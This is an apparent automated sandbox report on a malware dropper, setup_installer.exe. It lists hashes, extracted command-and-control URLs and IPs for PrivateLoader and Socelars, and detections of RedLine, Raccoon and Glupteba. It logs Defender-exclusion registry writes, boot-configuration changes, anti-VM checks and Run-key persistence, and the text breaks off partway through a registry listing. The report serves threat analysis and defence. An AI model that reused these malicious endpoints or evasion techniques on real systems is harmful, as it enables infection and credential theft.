Analysis
-
max time kernel
46s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-11-2024 00:02
Static task
static1
Behavioral task
behavioral1
Sample
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
General
-
Target
setup_installer.exe
-
Size
14.8MB
-
MD5
1c22cb7db2e997ea03ef77144178d6bb
-
SHA1
c83e9132a3ee4f450a4bf2c94b5a7faaca897e0a
-
SHA256
181f984ec75872c83dbd516bf27bb0d995ba6da2727f963560a1336950587283
-
SHA512
29f535e83142b321e20f095f85b5402c3accc8ce7415461936c0bc72f4fd403969e1e2e6d030ea1b2bfc09b5eb9cb10be4938791016d25ad37c52911593c51cd
-
SSDEEP
393216:x7frfES3UxDBrxoqD/3ieHPDfVPQePOZi/f0Xbr9j:+S3UzrhnHrfqemo0XH9j
Malware Config
Extracted
socelars
http://www.wgqpw.com/
Extracted
privateloader
http://212.193.30.45/proxies.txt
http://212.193.30.29/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
212.192.241.62
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral3/files/0x00050000000193d1-100.dat family_fabookie -
Fabookie family
-
Glupteba family
-
Nullmixer family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Raccoon Stealer V1 payload 7 IoCs
resource yara_rule behavioral3/memory/832-228-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-232-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-231-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-230-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-227-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-226-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 behavioral3/memory/832-358-0x0000000000F70000-0x000000000140E000-memory.dmp family_raccoon_v1 -
Raccoon family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 9 IoCs
resource yara_rule behavioral3/memory/700-174-0x0000000000940000-0x0000000000A17000-memory.dmp family_redline behavioral3/memory/2436-173-0x0000000000FE0000-0x0000000001079000-memory.dmp family_redline behavioral3/memory/700-161-0x0000000000940000-0x0000000000A17000-memory.dmp family_redline behavioral3/memory/2436-158-0x0000000000FE0000-0x0000000001079000-memory.dmp family_redline behavioral3/memory/700-185-0x0000000000940000-0x0000000000A17000-memory.dmp family_redline behavioral3/memory/700-354-0x0000000000940000-0x0000000000A17000-memory.dmp family_redline behavioral3/memory/2436-353-0x0000000000FE0000-0x0000000001079000-memory.dmp family_redline behavioral3/memory/2436-385-0x0000000000FE0000-0x0000000001079000-memory.dmp family_redline behavioral3/memory/700-399-0x0000000000940000-0x0000000000A17000-memory.dmp family_redline -
Redline family
-
Socelars family
-
Socelars payload 1 IoCs
resource yara_rule behavioral3/files/0x0007000000016cb2-103.dat family_socelars -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Fri003da4b0a49fa71b6.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Fri003da4b0a49fa71b6.exe -
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral3/files/0x00050000000193d1-100.dat Nirsoft -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fri005fb51f7290280.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 448 bcdedit.exe 2588 bcdedit.exe 1768 bcdedit.exe 3048 bcdedit.exe 936 bcdedit.exe 2760 bcdedit.exe 2972 bcdedit.exe 2684 bcdedit.exe 1152 bcdedit.exe 1872 bcdedit.exe 2864 bcdedit.exe 992 bcdedit.exe 2876 bcdedit.exe 2968 bcdedit.exe -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral3/files/0x00050000000193d1-100.dat WebBrowserPassView -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1656 powershell.exe 2440 powershell.exe 1096 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1648 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral3/files/0x00050000000195c2-64.dat aspack_v212_v242 behavioral3/files/0x00050000000195c6-71.dat aspack_v212_v242 behavioral3/files/0x000500000001958b-67.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri005fb51f7290280.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri005fb51f7290280.exe -
Executes dropped EXE 29 IoCs
pid Process 2784 setup_install.exe 2044 Fri00787d8fbee5ae2.exe 2648 Fri006106b9f3.exe 2152 Fri00d11173c6bdedf9.exe 2076 Fri0009837acb0e3f.exe 1032 Fri00a70cad68c17.exe 2652 Fri00a6abc266a1e.exe 2036 Fri00c13dae83a537d.exe 896 Fri002d0eb8ad1c781.exe 2376 Fri006e94a111.exe 2436 Fri009539f6ca3c9b1.exe 700 Fri00ea564f2dd.exe 1316 Fri00aca824dcfa8.exe 944 Fri0024e24e95c5.exe 1848 Fri00d11173c6bdedf9.exe 832 Fri005fb51f7290280.exe 1200 Fri007b242a25024db8.exe 2272 Fri007f1a815cd.exe 2212 Fri00aca824dcfa8.tmp 2088 Fri006955771d552.exe 1788 Fri003da4b0a49fa71b6.exe 2664 Fri00aca824dcfa8.exe 2348 Fri00aca824dcfa8.tmp 2360 Q7J2UrO1XZC8DQK.EXe 1684 Fri003da4b0a49fa71b6.exe 1708 csrss.exe 944 Fri006955771d552.exe 1632 patch.exe 2432 injector.exe -
Loads dropped DLL 64 IoCs
pid Process 2360 setup_installer.exe 2360 setup_installer.exe 2360 setup_installer.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 2784 setup_install.exe 1064 cmd.exe 1628 cmd.exe 1628 cmd.exe 988 cmd.exe 2152 Fri00d11173c6bdedf9.exe 1484 cmd.exe 1484 cmd.exe 276 cmd.exe 276 cmd.exe 2152 Fri00d11173c6bdedf9.exe 1624 cmd.exe 2076 Fri0009837acb0e3f.exe 2076 Fri0009837acb0e3f.exe 1968 cmd.exe 964 cmd.exe 2020 cmd.exe 1032 Fri00a70cad68c17.exe 1032 Fri00a70cad68c17.exe 880 cmd.exe 2152 Fri00d11173c6bdedf9.exe 1476 cmd.exe 2236 cmd.exe 1208 cmd.exe 2036 Fri00c13dae83a537d.exe 2036 Fri00c13dae83a537d.exe 1476 cmd.exe 896 Fri002d0eb8ad1c781.exe 896 Fri002d0eb8ad1c781.exe 1496 cmd.exe 2376 Fri006e94a111.exe 2376 Fri006e94a111.exe 1724 cmd.exe 2436 Fri009539f6ca3c9b1.exe 2436 Fri009539f6ca3c9b1.exe 700 Fri00ea564f2dd.exe 700 Fri00ea564f2dd.exe 1316 Fri00aca824dcfa8.exe 1316 Fri00aca824dcfa8.exe 944 Fri0024e24e95c5.exe 944 Fri0024e24e95c5.exe 1848 Fri00d11173c6bdedf9.exe 1848 Fri00d11173c6bdedf9.exe 832 Fri005fb51f7290280.exe 832 Fri005fb51f7290280.exe 1200 Fri007b242a25024db8.exe 1200 Fri007b242a25024db8.exe 1912 cmd.exe 1912 cmd.exe 2272 Fri007f1a815cd.exe 2272 Fri007f1a815cd.exe 1316 Fri00aca824dcfa8.exe 2860 cmd.exe 1676 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Binary Proxy Execution: Odbcconf 1 TTPs 3 IoCs
Abuse Odbcconf to proxy execution of malicious code.
pid Process 712 mshta.exe 2264 cmd.exe 3032 odbcconf.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Fri003da4b0a49fa71b6.exe = "0" Fri003da4b0a49fa71b6.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Fri003da4b0a49fa71b6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri005fb51f7290280.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 32 IoCs
flow ioc 163 iplogger.org 175 iplogger.org 17 iplogger.org 84 iplogger.org 161 iplogger.org 162 iplogger.org 44 iplogger.org 122 pastebin.com 79 iplogger.org 146 iplogger.org 177 iplogger.org 160 iplogger.org 167 iplogger.org 50 iplogger.org 121 pastebin.com 155 iplogger.org 158 iplogger.org 149 iplogger.org 39 iplogger.org 153 iplogger.org 168 iplogger.org 154 iplogger.org 164 iplogger.org 18 iplogger.org 33 iplogger.org 129 iplogger.org 134 iplogger.org 176 iplogger.org 55 iplogger.org 123 pastebin.com 156 iplogger.org 166 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2436 Fri009539f6ca3c9b1.exe 700 Fri00ea564f2dd.exe 832 Fri005fb51f7290280.exe 832 Fri005fb51f7290280.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2088 set thread context of 944 2088 Fri006955771d552.exe 116 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN Fri003da4b0a49fa71b6.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\rss Fri003da4b0a49fa71b6.exe File created C:\Windows\rss\csrss.exe Fri003da4b0a49fa71b6.exe File created C:\Windows\Logs\CBS\CbsPersist_20241111000303.cab makecab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 2244 2272 WerFault.exe 74 1692 896 WerFault.exe 68 2916 2376 WerFault.exe 59 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri009539f6ca3c9b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language odbcconf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006955771d552.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00d11173c6bdedf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006955771d552.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00d11173c6bdedf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri007b242a25024db8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri000511de73f4d6ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00c13dae83a537d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri005fb51f7290280.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00a70cad68c17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Q7J2UrO1XZC8DQK.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri0009837acb0e3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri002d0eb8ad1c781.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006e94a111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00ea564f2dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri007f1a815cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri003da4b0a49fa71b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri0024e24e95c5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri003da4b0a49fa71b6.exe -
Kills process with taskkill 2 IoCs
pid Process 2292 taskkill.exe 2552 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B4BD971-9FC0-11EF-9CB4-D238DC34531D} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\Version = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created 